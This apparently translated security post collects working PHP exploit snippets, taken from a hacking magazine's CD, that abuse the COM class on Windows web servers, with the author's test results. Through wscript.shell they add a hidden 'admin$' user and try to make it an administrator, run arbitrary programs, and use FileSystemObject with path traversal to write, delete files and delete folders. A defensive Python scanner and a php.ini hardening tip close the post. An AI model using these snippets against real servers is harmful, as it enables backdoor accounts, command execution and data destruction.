The issue affects PHP 5 on Windows, and applies to both Apache 2 and IIS.
Adding a user
<?php
$wscript = new COM('wscript.shell');
$wscript->Run("cmd.exe /c net user admin$ /add");
$wscript->Run("cmd.exe /c net localgroup administrators admin$ /add");
?>
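Test result: a restricted user was added, but it was not added to the Administrators group.
Running a program through the HTTP server software.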
<?php
$compatUI = new COM('{0355854A-7F23-47E2-B7C3-97EE8DD42CD8}');
$compatUI->RunApplication("something", "notepad.exe", 1);
?>
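Test result: the process inherited the privileges of the HTTP server software.
A process started by HTTP server software that runs as a service is not visible, but it becomes visible if the script is run from Zend Studio.
The remaining code was not tested item by item; the code from the CD bundled with 黑防 magazine is pasted below.
RunApplication function test code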
<?php
$compatUI = new COM('{0355854A-7F23-47E2-B7C3-97EE8DD42CD8}');
$compatUI->RunApplication("something", "notepad.exe", 1);
?>
Wscript command execution test code
<?php
$wscript = new COM('wscript.shell');
$wscript->Run("cmd.exe /c calc.exe");
?>
<?php
$wscript = new COM('wscript.shell');
$wscript->Run("cmd.exe /c net user admin$ /add");
$wscript->Run("cmd.exe /c net localgroup administrators admin$ /add");
?>
OpenTextFile test code
<?php
// The backslash must be escaped inside a double-quoted PHP string
$mPath = str_repeat("..\\",20);
$FSO = new COM('Scripting.FileSystemObject');
$FSO->OpenTextFile($mPath."bat.bat", 8, true);
?>
DeleteFile test code
<?php
// The backslash must be escaped inside a double-quoted PHP string
$mPath = str_repeat("..\\",20);
$FSOdelFile = new COM('Scripting.FileSystemObject');
$FSOdelFile->DeleteFile($mPath.".\\*.dat", True);
?>
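DeleteFolder test code
<?php
// The backslash must be escaped inside a double-quoted PHP string
$mPath = str_repeat("..\\",20);
$FSOdelFolder = new COM('Scripting.FileSystemObject');
// "\\11" keeps PHP from parsing "\11" as an octal escape (tab character)
$FSOdelFolder->DeleteFolder($mPath.".\\11", True);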
?>
Create function test code
<?php
$user = new COM('{60664CAF-AF0D-0004-A300-5C7D25FF22A0}');
$user->Create("asd");
?>
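A defender-side check for the pattern in the listings above, as an added example that is not part of the original post or the magazine CD: a Python scanner that flags `new COM(...)` in PHP source and reports the ProgID/CLSID and the methods called on the resulting object. The function name, risk labels and sample input are constructed for illustration; the identifiers in `KNOWN` are the ones that appear on this page.

```python
import re

# Identifiers taken from the listings on this page; the labels are this example's own.
KNOWN = {
    "wscript.shell": "command execution via Run",
    "scripting.filesystemobject": "file write/delete via FileSystemObject",
    "{0355854a-7f23-47e2-b7c3-97ee8dd42cd8}": "process launch via RunApplication",
    "{60664caf-af0d-0004-a300-5c7d25ff22a0}": "Create call on CLSID object",
}

# $var = new COM('id'): PHP keywords and class names are case-insensitive,
# either quote style may be used, and whitespace is optional.
NEW_COM = re.compile(
    r"(\$\w+)\s*=\s*new\s+COM\s*\(\s*(['\"])(.+?)\2", re.IGNORECASE)

def scan_php(source):
    """Return one finding per COM instantiation in PHP source text."""
    findings = []
    for m in NEW_COM.finditer(source):
        var, ident = m.group(1), m.group(3)
        # Methods invoked later on the same variable, e.g. $wscript->Run(
        calls = re.findall(re.escape(var) + r"\s*->\s*(\w+)\s*\(",
                           source[m.end():])
        findings.append({
            "line": source.count("\n", 0, m.start()) + 1,
            "id": ident,
            "risk": KNOWN.get(ident.lower(),
                              "unlisted COM object, review manually"),
            "methods": sorted(set(calls)),
        })
    return findings

# Constructed sample input (not a real file)
SAMPLE = """<?php
$a = new COM('WScript.Shell');
$a->Run("cmd.exe /c calc.exe");
$fso = NEW com ( "Scripting.FileSystemObject" );
$fso->DeleteFile("x.dat", true);
$x = new COM('Some.Other');
?>"""

if __name__ == "__main__":
    for finding in scan_php(SAMPLE):
        print(finding)
```

On hosts whose applications do not need COM, listing `COM` in the `disable_classes` directive of php.ini prevents these objects from being instantiated at all.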